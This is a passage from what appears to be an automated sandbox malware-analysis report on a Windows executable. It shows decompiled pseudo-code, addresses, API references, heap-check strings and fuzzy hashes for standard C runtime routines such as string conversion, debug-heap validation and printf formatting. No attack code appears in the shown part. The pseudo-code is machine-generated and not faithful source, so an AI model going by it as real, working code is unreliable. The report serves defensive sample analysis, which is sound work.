								E00410370(_t274 - 0x20);
								_t150 =  *(_t274 - 0x60);
							}
						} else {
							 *(_t274 - 0x48) =  *(_t274 - 4) - 1;
							E00410370(_t274 - 0x20);
							_t150 =  *(_t274 - 0x48);
						}
						goto L47;
					}
					if( *(_t274 + 0x10) > 0) {
						 *(_t274 + 0x10) = E0041DE10( *(_t274 + 0xc),  *(_t274 + 0x10));
					}
					_t256 =  *(_t274 + 0xc);
					_t189 =  *((intOrPtr*)(E004103A0(_t274 - 0x20)));
					_t243 =  *(_t189 + 4);
					 *(_t274 - 4) = WideCharToMultiByte( *(_t189 + 4), 0,  *(_t274 + 0xc),  *(_t274 + 0x10),  *(_t274 + 8),  *(_t274 + 0x10), 0, _t274 - 0x10);
					if( *(_t274 - 4) == 0 ||  *(_t274 - 0x10) != 0) {
						 *((intOrPtr*)(L00411810(_t243))) = 0x2a;
						 *(_t274 - 0x44) = 0xffffffff;
						E00410370(_t274 - 0x20);
						_t150 =  *(_t274 - 0x44);
					} else {
						if( *((char*)( &(( *(_t274 + 8))[ *(_t274 - 4)]) - 1)) == 0) {
							 *(_t274 - 4) =  *(_t274 - 4) - 1;
						}
						_t256 =  *(_t274 - 4);
						 *(_t274 - 0x40) =  *(_t274 - 4);
						E00410370(_t274 - 0x20);
						_t150 =  *(_t274 - 0x40);
					}
					goto L47;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t248 =  *(_t274 - 4);
					if( *(_t274 - 4) >=  *(_t274 + 0x10)) {
						break;
					}
					_t256 =  *(_t274 + 0xc);
					if(( *( *(_t274 + 0xc)) & 0x0000ffff) <= 0xff) {
						( *(_t274 + 8))[ *(_t274 - 4)] =  *( *(_t274 + 0xc));
						_t256 =  *( *(_t274 + 0xc)) & 0x0000ffff;
						 *(_t274 + 0xc) =  &(( *(_t274 + 0xc))[1]);
						if(( *( *(_t274 + 0xc)) & 0x0000ffff) != 0) {
							_t256 =  *(_t274 - 4) + 1;
							 *(_t274 - 4) =  *(_t274 - 4) + 1;
							continue;
						}
						 *(_t274 - 0x38) =  *(_t274 - 4);
						E00410370(_t274 - 0x20);
						_t150 =  *(_t274 - 0x38);
					} else {
						 *((intOrPtr*)(L00411810(_t248))) = 0x2a;
						 *(_t274 - 0x34) = 0xffffffff;
						E00410370(_t274 - 0x20);
						_t150 =  *(_t274 - 0x34);
					}
					goto L47;
				}
				 *(_t274 - 0x3c) =  *(_t274 - 4);
				E00410370(_t274 - 0x20);
				_t150 =  *(_t274 - 0x3c);
				goto L47;
			}

0x0041da27
0x0041dd5e
0x0041dd63
0x0041dd69
0x0041dd9b
0x0041dd9e
0x0041dda3
0x0041ddaf
0x0041ddb6
0x0041ddc3
0x0041ddc9
0x0041ddd3
0x0041ddd8
0x0041dddd
0x0041dde3
0x0041dde9
0x0041ddee
0x0041ddee
0x0041dd6b
0x0041dd6b
0x0041dd77
0x0041dd7d
0x0041dd82
0x0041dd82
0x0041ddfb
0x0041de08
0x0041de08
0x0041da3b
0x0041dae5
0x0041dbb1
0x0041dbb3
0x0041dbbd
0x0041dbc4
0x0041dbe9
0x0041dbfb
0x0041dc01
0x0041dc0b
0x0041dc10
0x0041dc18
0x0041dc18
0x0041dc2d
0x0041dc4f
0x0041dc51
0x0041dc5b
0x0041dc62
0x0041dc6f
0x0041dc75
0x0041dc7f
0x0041dc84
0x0041dc8c
0x0041dc90
0x0041dc9d
0x0041dca3
0x0041dcad
0x0041dcb2
0x0041dcba
0x0041dcc3
0x0041dcdb
0x0041dcf6
0x0041dd0b
0x0041dd10
0x0041dd18
0x0041dcea
0x0041dcf3
0x00000000
0x0041dcf3
0x0041dd1d
0x0041dd23
0x0041dd28
0x00000000
0x0041dd28
0x0041dd35
0x0041dd38
0x00000000
0x0041dd38
0x0041dcc8
0x0041dcce
0x0041dcd3
0x0041dcd3
0x0041dc90
0x00000000
0x0041dc62
0x0041dd43
0x0041dd49
0x0041dd4e
0x0041dd4e
0x0041dbcc
0x0041dbd2
0x0041dbd8
0x0041dbdd
0x0041dbdd
0x00000000
0x0041dbc4
0x0041daef
0x0041db01
0x0041db01
0x0041db16
0x0041db24
0x0041db26
0x0041db30
0x0041db37
0x0041db71
0x0041db77
0x0041db81
0x0041db86
0x0041db3f
0x0041db4b
0x0041db53
0x0041db53
0x0041db56
0x0041db59
0x0041db5f
0x0041db64
0x0041db64
0x00000000
0x00000000
0x00000000
0x00000000
0x0041da41
0x0041da41
0x0041da41
0x0041da47
0x00000000
0x00000000
0x0041da49
0x0041da54
0x0041da83
0x0041da88
0x0041da91
0x0041da96
0x0041dab1
0x0041dab4
0x00000000
0x0041dab4
0x0041da9b
0x0041daa1
0x0041daa6
0x0041da56
0x0041da5b
0x0041da61
0x0041da6b
0x0041da70
0x0041da70
0x00000000
0x0041da54
0x0041dabc
0x0041dac2
0x0041dac7
0x00000000

APIs

_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041DA6B
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041DAA1
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041DAC2
wcsncnt.LIBCMTD ref: 0041DAF9
WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041DB2A
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041DB5F
_wcslen.LIBCMTD ref: 0041DD6F
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041DD7D

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: Locale$UpdateUpdate::~_$ByteCharMultiWide_wcslenwcsncnt
String ID:
API String ID: 4277434810-0
Opcode ID: 0bfc5201e7a7479a264d18e6f8c871f13eb222ebeff5f0a6979fa8b0dc6ca371
Instruction ID: a853c56808954d88a84a162ec801f5a7f01498a4ee8c0ac444587c140377e019
Opcode Fuzzy Hash: 0bfc5201e7a7479a264d18e6f8c871f13eb222ebeff5f0a6979fa8b0dc6ca371
Instruction Fuzzy Hash: D8D10BB5E00108DFCB08DF94C994AEEB7B1FF45304F10855AE4226B2A1D778AE82DF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040F325 Relevance: 30.0, APIs: 6, Strings: 11, Instructions: 264memoryCOMMON

Download Yara Rule

APIs

_CheckBytes.LIBCMTD ref: 0040F339
__CrtIsValidHeapPointer.LIBCMTD ref: 0040F3C5
_CheckBytes.LIBCMTD ref: 0040F470
_CheckBytes.LIBCMTD ref: 0040F52A
_memset.LIBCMT ref: 0040F621
__free_base.LIBCMTD ref: 0040F62D

Strings

tDj, xrefs: 0040F37B
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 0040F4B9
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040F3DD, 0040F43B, 0040F5F6
_CrtIsValidHeapPointer(pUserData), xrefs: 0040F3D1
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 0040F573
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 0040F5B1
Client hook free failure., xrefs: 0040F39C
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 0040F4F7
The Block at 0x%p was allocated by aligned routines, use _aligned_free(), xrefs: 0040F349
_BLOCK_TYPE_IS_VALID(pHead->nBlockUse), xrefs: 0040F42F
pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ, xrefs: 0040F5EA

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: BytesCheck$HeapPointerValid__free_base_memset
String ID: Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c$pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ$tDj
API String ID: 25084783-3417358119
Opcode ID: effd0d7ac718afee2e91c8642281502eafb325ae693e9868a80faac9591c2660
Instruction ID: 7640c5b9af15314081cffac23d47365fd30827e490631008bb7c06d5dcdc4872
Opcode Fuzzy Hash: effd0d7ac718afee2e91c8642281502eafb325ae693e9868a80faac9591c2660
Instruction Fuzzy Hash: 5891D170A40204BBDB24DF44CD86F6A7365AB48708F30417AF604BB6C2D2B9EE45CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00422227 Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 241
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00422227(void* __eflags) {
				signed int* _t494;
				signed int _t502;
				void* _t507;
				signed int _t509;
				void* _t529;
				signed int _t547;
				void* _t558;
				signed int _t567;
				void* _t625;
				void* _t626;
				signed int _t627;
				void* _t629;
				void* _t630;

				L0:
				while(1) {
					L0:
					_t494 = E0041F270(_t627 + 0x14);
					_t630 = _t629 + 4;
					 *(_t627 - 0x298) = _t494;
					if(E00424120() != 0) {
						goto L118;
					}
					L109:
					__edx = 0;
					if(0 == 0) {
						 *(__ebp - 0x32c) = 0;
					} else {
						 *(__ebp - 0x32c) = 1;
					}
					__eax =  *(__ebp - 0x32c);
					 *(__ebp - 0x29c) =  *(__ebp - 0x32c);
					if( *(__ebp - 0x29c) == 0) {
						_push(L"(\"\'n\' format specifier disabled\", 0)");
						_push(0);
						_push(0x695);
						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
						_push(2);
						__eax = L0040C820();
						__esp = __esp + 0x14;
						if(__eax == 1) {
							asm("int3");
						}
					}
					if( *(__ebp - 0x29c) != 0) {
						L117:
						while(1) {
							L190:
							if( *(_t627 - 0x28) != 0) {
								goto L216;
							}
							L191:
							if(( *(_t627 - 0x10) & 0x00000040) != 0) {
								if(( *(_t627 - 0x10) & 0x00000100) == 0) {
									if(( *(_t627 - 0x10) & 0x00000001) == 0) {
										if(( *(_t627 - 0x10) & 0x00000002) != 0) {
											 *((char*)(_t627 - 0x14)) = 0x20;
											 *(_t627 - 0x1c) = 1;
										}
									} else {
										 *((char*)(_t627 - 0x14)) = 0x2b;
										 *(_t627 - 0x1c) = 1;
									}
								} else {
									 *((char*)(_t627 - 0x14)) = 0x2d;
									 *(_t627 - 0x1c) = 1;
								}
							}
							 *((intOrPtr*)(_t627 - 0x2c4)) =  *((intOrPtr*)(_t627 - 0x18)) -  *(_t627 - 0x24) -  *(_t627 - 0x1c);
							if(( *(_t627 - 0x10) & 0x0000000c) == 0) {
								E00422C60(0x20,  *((intOrPtr*)(_t627 - 0x2c4)),  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
								_t630 = _t630 + 0x10;
							}
							E00422CA0( *(_t627 - 0x1c), _t627 - 0x14,  *(_t627 - 0x1c),  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
							_t630 = _t630 + 0x10;
							if(( *(_t627 - 0x10) & 0x00000008) != 0) {
								if(( *(_t627 - 0x10) & 0x00000004) == 0) {
									E00422C60(0x30,  *((intOrPtr*)(_t627 - 0x2c4)),  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
									_t630 = _t630 + 0x10;
								}
							}
							if( *(_t627 - 0xc) == 0) {
								L212:
								E00422CA0( *((intOrPtr*)(_t627 - 4)),  *((intOrPtr*)(_t627 - 4)),  *(_t627 - 0x24),  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
								_t630 = _t630 + 0x10;
								goto L213;
							} else {
								L204:
								if( *(_t627 - 0x24) <= 0) {
									goto L212;
								}
								L205:
								 *(_t627 - 0x2dc) = 0;
								 *((intOrPtr*)(_t627 - 0x2c8)) =  *((intOrPtr*)(_t627 - 4));
								 *(_t627 - 0x2cc) =  *(_t627 - 0x24);
								while(1) {
									L206:
									 *(_t627 - 0x2cc) =  *(_t627 - 0x2cc) - 1;
									if( *(_t627 - 0x2cc) == 0) {
										break;
									}
									L207:
									 *(_t627 - 0x32e) =  *((intOrPtr*)( *((intOrPtr*)(_t627 - 0x2c8))));
									_t547 = E00424E90(_t627 - 0x2d0, _t627 - 0x2d8, 6,  *(_t627 - 0x32e) & 0x0000ffff);
									_t630 = _t630 + 0x10;
									 *(_t627 - 0x2dc) = _t547;
									 *((intOrPtr*)(_t627 - 0x2c8)) =  *((intOrPtr*)(_t627 - 0x2c8)) + 2;
									if( *(_t627 - 0x2dc) != 0) {
										L209:
										 *(_t627 - 0x24c) = 0xffffffff;
										break;
									}
									L208:
									if( *(_t627 - 0x2d0) != 0) {
										L210:
										E00422CA0( *((intOrPtr*)(_t627 + 8)), _t627 - 0x2d8,  *(_t627 - 0x2d0),  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
										_t630 = _t630 + 0x10;
										continue;
									}
									goto L209;
								}
								L211:
								L213:
								if( *(_t627 - 0x24c) >= 0) {
									if(( *(_t627 - 0x10) & 0x00000004) != 0) {
										E00422C60(0x20,  *((intOrPtr*)(_t627 - 0x2c4)),  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
										_t630 = _t630 + 0x10;
									}
								}
							}
							L216:
							if( *(_t627 - 0x20) != 0) {
								L0040F230( *(_t627 - 0x20), 2);
								_t630 = _t630 + 8;
								 *(_t627 - 0x20) = 0;
							}
							while(1) {
								L218:
								 *(_t627 - 0x251) =  *( *(_t627 + 0xc));
								_t598 =  *(_t627 - 0x251);
								 *(_t627 + 0xc) =  *(_t627 + 0xc) + 1;
								if( *(_t627 - 0x251) == 0 ||  *(_t627 - 0x24c) < 0) {
									break;
								} else {
									if( *(_t627 - 0x251) < 0x20 ||  *(_t627 - 0x251) > 0x78) {
										 *(_t627 - 0x310) = 0;
									} else {
										 *(_t627 - 0x310) =  *( *(_t627 - 0x251) + L"h != _T(\'\\0\'))") & 0xf;
									}
								}
								L7:
								 *(_t627 - 0x250) =  *(_t627 - 0x310);
								_t509 =  *(_t627 - 0x250) * 9;
								_t567 =  *(_t627 - 0x25c);
								_t598 = ( *(_t509 + _t567 + 0x4081a0) & 0x000000ff) >> 4;
								 *(_t627 - 0x25c) = ( *(_t509 + _t567 + 0x4081a0) & 0x000000ff) >> 4;
								if( *(_t627 - 0x25c) != 8) {
									L16:
									 *(_t627 - 0x318) =  *(_t627 - 0x25c);
									if( *(_t627 - 0x318) > 7) {
										continue;
									}
									L17:
									switch( *((intOrPtr*)( *(_t627 - 0x318) * 4 +  &M00422AB0))) {
										case 0:
											L18:
											 *(_t627 - 0xc) = 0;
											_t512 = E00420DA0( *(_t627 - 0x251) & 0x000000ff, E004103A0(_t627 - 0x40));
											_t633 = _t630 + 8;
											__eflags = _t512;
											if(_t512 == 0) {
												L24:
												E00422BC0( *(_t627 - 0x251) & 0x000000ff,  *(_t627 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
												_t630 = _t633 + 0xc;
												goto L218;
											} else {
												E00422BC0( *((intOrPtr*)(_t627 + 8)),  *(_t627 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
												_t633 = _t633 + 0xc;
												_t572 =  *( *(_t627 + 0xc));
												 *(_t627 - 0x251) =  *( *(_t627 + 0xc));
												_t598 =  *(_t627 + 0xc) + 1;
												__eflags = _t598;
												 *(_t627 + 0xc) = _t598;
												asm("sbb eax, eax");
												 *(_t627 - 0x27c) =  ~( ~( *(_t627 - 0x251)));
												if(_t598 == 0) {
													_push(L"(ch != _T(\'\\0\'))");
													_push(0);
													_push(0x486);
													_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
													_push(2);
													_t524 = L0040C820();
													_t633 = _t633 + 0x14;
													__eflags = _t524 - 1;
													if(_t524 == 1) {
														asm("int3");
													}
												}
												L22:
												__eflags =  *(_t627 - 0x27c);
												if( *(_t627 - 0x27c) != 0) {
													goto L24;
												} else {
													 *((intOrPtr*)(L00411810(_t572))) = 0x16;
													E0040C660(_t558, _t572, _t625, _t626, L"(ch != _T(\'\\0\'))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x486, 0);
													 *(_t627 - 0x2f4) = 0xffffffff;
													E00410370(_t627 - 0x40);
													_t502 =  *(_t627 - 0x2f4);
													goto L229;
												}
											}
										case 1:
											L25:
											 *(__ebp - 0x2c) = 0;
											__edx =  *(__ebp - 0x2c);
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											__eax =  *(__ebp - 0x28);
											 *(__ebp - 0x18) =  *(__ebp - 0x28);
											__ecx =  *(__ebp - 0x18);
											 *(__ebp - 0x1c) = __ecx;
											 *(__ebp - 0x10) = 0;
											 *(__ebp - 0x30) = 0xffffffff;
											 *(__ebp - 0xc) = 0;
											goto L218;
										case 2:
											L26:
											__edx =  *((char*)(__ebp - 0x251));
											 *(__ebp - 0x31c) =  *((char*)(__ebp - 0x251));
											 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
											 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
											__eflags =  *(__ebp - 0x31c) - 0x10;
											if( *(__ebp - 0x31c) > 0x10) {
												goto L33;
											}
											L27:
											__ecx =  *(__ebp - 0x31c);
											_t73 = __ecx + 0x422ae8; // 0x498d04
											__edx =  *_t73 & 0x000000ff;
											switch( *((intOrPtr*)(( *_t73 & 0x000000ff) * 4 +  &M00422AD0))) {
												case 0:
													goto L30;
												case 1:
													goto L31;
												case 2:
													goto L29;
												case 3:
													goto L28;
												case 4:
													goto L32;
												case 5:
													goto L33;
											}
										case 3:
											L34:
											__edx =  *((char*)(__ebp - 0x251));
											__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
											if( *((char*)(__ebp - 0x251)) != 0x2a) {
												__eax =  *(__ebp - 0x18);
												__eax =  *(__ebp - 0x18) * 0xa;
												__eflags = __eax;
												__ecx =  *((char*)(__ebp - 0x251));
												_t97 = __ecx - 0x30; // -48
												__edx = __eax + _t97;
												 *(__ebp - 0x18) = __eax + _t97;
											} else {
												__eax = __ebp + 0x14;
												 *(__ebp - 0x18) = E0041F270(__ebp + 0x14);
												__eflags =  *(__ebp - 0x18);
												if( *(__ebp - 0x18) < 0) {
													__ecx =  *(__ebp - 0x10);
													__ecx =  *(__ebp - 0x10) | 0x00000004;
													__eflags = __ecx;
													 *(__ebp - 0x10) = __ecx;
													 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
													 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
												}
											}
											goto L218;
										case 4:
											L40:
											 *(__ebp - 0x30) = 0;
											goto L218;
										case 5:
											L41:
											__eax =  *((char*)(__ebp - 0x251));
											__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
											if( *((char*)(__ebp - 0x251)) != 0x2a) {
												__edx =  *(__ebp - 0x30);
												__edx =  *(__ebp - 0x30) * 0xa;
												__eflags = __edx;
												_t108 =  *((char*)(__ebp - 0x251)) - 0x30; // -48
												__ecx = __edx + _t108;
												 *(__ebp - 0x30) = __ecx;
											} else {
												__ecx = __ebp + 0x14;
												 *(__ebp - 0x30) = E0041F270(__ebp + 0x14);
												__eflags =  *(__ebp - 0x30);
												if( *(__ebp - 0x30) < 0) {
													 *(__ebp - 0x30) = 0xffffffff;
												}
											}
											goto L218;
										case 6:
											L47:
											__edx =  *((char*)(__ebp - 0x251));
											 *(__ebp - 0x320) =  *((char*)(__ebp - 0x251));
											 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
											 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
											__eflags =  *(__ebp - 0x320) - 0x2e;
											if( *(__ebp - 0x320) > 0x2e) {
												L70:
												goto L218;
											}
											L48:
											__ecx =  *(__ebp - 0x320);
											_t116 = __ecx + 0x422b10; // 0x231e9003
											__edx =  *_t116 & 0x000000ff;
											switch( *((intOrPtr*)(( *_t116 & 0x000000ff) * 4 +  &M00422AFC))) {
												case 0:
													L53:
													__edx =  *(__ebp + 0xc);
													__eax =  *( *(__ebp + 0xc));
													__eflags =  *( *(__ebp + 0xc)) - 0x36;
													if( *( *(__ebp + 0xc)) != 0x36) {
														L56:
														__edx =  *(__ebp + 0xc);
														__eax =  *( *(__ebp + 0xc));
														__eflags =  *( *(__ebp + 0xc)) - 0x33;
														if( *( *(__ebp + 0xc)) != 0x33) {
															L59:
															__edx =  *(__ebp + 0xc);
															__eax =  *( *(__ebp + 0xc));
															__eflags =  *( *(__ebp + 0xc)) - 0x64;
															if( *( *(__ebp + 0xc)) == 0x64) {
																L65:
																L67:
																goto L70;
															}
															L60:
															__ecx =  *(__ebp + 0xc);
															__edx =  *__ecx;
															__eflags =  *__ecx - 0x69;
															if( *__ecx == 0x69) {
																goto L65;
															}
															L61:
															__eax =  *(__ebp + 0xc);
															__ecx =  *( *(__ebp + 0xc));
															__eflags = __ecx - 0x6f;
															if(__ecx == 0x6f) {
																goto L65;
															}
															L62:
															__edx =  *(__ebp + 0xc);
															__eax =  *( *(__ebp + 0xc));
															__eflags =  *( *(__ebp + 0xc)) - 0x75;
															if( *( *(__ebp + 0xc)) == 0x75) {
																goto L65;
															}
															L63:
															__ecx =  *(__ebp + 0xc);
															__edx =  *__ecx;
															__eflags =  *__ecx - 0x78;
															if( *__ecx == 0x78) {
																goto L65;
															}
															L64:
															__eax =  *(__ebp + 0xc);
															__ecx =  *( *(__ebp + 0xc));
															__eflags = __ecx - 0x58;
															if(__ecx != 0x58) {
																 *(__ebp - 0x25c) = 0;
																goto L18;
															}
															goto L65;
														}
														L57:
														__ecx =  *(__ebp + 0xc);
														__edx =  *((char*)(__ecx + 1));
														__eflags =  *((char*)(__ecx + 1)) - 0x32;
														if( *((char*)(__ecx + 1)) != 0x32) {
															goto L59;
														} else {
															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
															__ecx =  *(__ebp - 0x10);
															__ecx =  *(__ebp - 0x10) & 0xffff7fff;
															 *(__ebp - 0x10) = __ecx;
															goto L67;
														}
													}
													L54:
													__ecx =  *(__ebp + 0xc);
													__edx =  *((char*)(__ecx + 1));
													__eflags =  *((char*)(__ecx + 1)) - 0x34;
													if( *((char*)(__ecx + 1)) != 0x34) {
														goto L56;
													} else {
														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
														__ecx =  *(__ebp - 0x10);
														__ecx =  *(__ebp - 0x10) | 0x00008000;
														 *(__ebp - 0x10) = __ecx;
														goto L67;
													}
												case 1:
													L68:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
													goto L70;
												case 2:
													L49:
													__eax =  *(__ebp + 0xc);
													__ecx =  *( *(__ebp + 0xc));
													__eflags = __ecx - 0x6c;
													if(__ecx != 0x6c) {
														__ecx =  *(__ebp - 0x10);
														__ecx =  *(__ebp - 0x10) | 0x00000010;
														__eflags = __ecx;
														 *(__ebp - 0x10) = __ecx;
													} else {
														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
													}
													goto L70;
												case 3:
													L69:
													__eax =  *(__ebp - 0x10);
													__eax =  *(__ebp - 0x10) | 0x00000800;
													__eflags = __eax;
													 *(__ebp - 0x10) = __eax;
													goto L70;
												case 4:
													goto L70;
											}
										case 7:
											L71:
											__ecx =  *((char*)(__ebp - 0x251));
											 *(__ebp - 0x324) = __ecx;
											 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
											 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
											__eflags =  *(__ebp - 0x324) - 0x37;
											if( *(__ebp - 0x324) > 0x37) {
												goto L190;
												do {
													do {
														while(1) {
															L190:
															if( *(_t627 - 0x28) != 0) {
																goto L216;
															}
															goto L191;
														}
														L186:
														__ebp - 0x49 = __ebp - 0x49 -  *(__ebp - 4);
														 *(__ebp - 0x24) = __ebp - 0x49 -  *(__ebp - 4);
														__ecx =  *(__ebp - 4);
														__ecx =  *(__ebp - 4) + 1;
														 *(__ebp - 4) = __ecx;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
														__eflags =  *(__ebp - 0x10) & 0x00000200;
													} while (( *(__ebp - 0x10) & 0x00000200) == 0);
													__eflags =  *(__ebp - 0x24);
													if( *(__ebp - 0x24) == 0) {
														break;
													}
													L188:
													__eax =  *(__ebp - 4);
													__ecx =  *( *(__ebp - 4));
													__eflags = __ecx - 0x30;
												} while (__ecx == 0x30);
												L189:
												 *(__ebp - 4) =  *(__ebp - 4) - 1;
												 *(__ebp - 4) =  *(__ebp - 4) - 1;
												__eax =  *(__ebp - 4);
												 *( *(__ebp - 4)) = 0x30;
												__ecx =  *(__ebp - 0x24);
												__ecx =  *(__ebp - 0x24) + 1;
												__eflags = __ecx;
												 *(__ebp - 0x24) = __ecx;
												while(1) {
													L190:
													if( *(_t627 - 0x28) != 0) {
														goto L216;
													}
													goto L191;
												}
											}
											L72:
											_t157 =  *(__ebp - 0x324) + 0x422b7c; // 0xcccccc0d
											__ecx =  *_t157 & 0x000000ff;
											switch( *((intOrPtr*)(__ecx * 4 +  &M00422B40))) {
												case 0:
													L122:
													 *(__ebp - 0x2c) = 1;
													__ecx =  *((char*)(__ebp - 0x251));
													__ecx =  *((char*)(__ebp - 0x251)) + 0x20;
													__eflags = __ecx;
													 *((char*)(__ebp - 0x251)) = __cl;
													goto L123;
												case 1:
													L73:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
													__eflags =  *(__ebp - 0x10) & 0x00000830;
													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
														__eax =  *(__ebp - 0x10);
														__eax =  *(__ebp - 0x10) | 0x00000800;
														__eflags = __eax;
														 *(__ebp - 0x10) = __eax;
													}
													goto L75;
												case 2:
													L88:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
													__eflags =  *(__ebp - 0x10) & 0x00000830;
													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
														__ecx =  *(__ebp - 0x10);
														__ecx =  *(__ebp - 0x10) | 0x00000800;
														__eflags = __ecx;
														 *(__ebp - 0x10) = __ecx;
													}
													goto L90;
												case 3:
													L146:
													 *(__ebp - 0x260) = 7;
													goto L148;
												case 4:
													L81:
													__eax = __ebp + 0x14;
													 *(__ebp - 0x288) = E0041F270(__ebp + 0x14);
													__eflags =  *(__ebp - 0x288);
													if( *(__ebp - 0x288) == 0) {
														L83:
														__edx =  *0x4bc060; // 0x408114
														 *(__ebp - 4) = __edx;
														__eax =  *(__ebp - 4);
														 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
														L87:
														goto L190;
													}
													L82:
													__ecx =  *(__ebp - 0x288);
													__eflags =  *(__ecx + 4);
													if( *(__ecx + 4) != 0) {
														L84:
														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
														__eflags =  *(__ebp - 0x10) & 0x00000800;
														if(( *(__ebp - 0x10) & 0x00000800) == 0) {
															 *(__ebp - 0xc) = 0;
															__edx =  *(__ebp - 0x288);
															__eax =  *(__edx + 4);
															 *(__ebp - 4) =  *(__edx + 4);
															__ecx =  *(__ebp - 0x288);
															__edx =  *__ecx;
															 *(__ebp - 0x24) =  *__ecx;
														} else {
															__edx =  *(__ebp - 0x288);
															__eax =  *(__edx + 4);
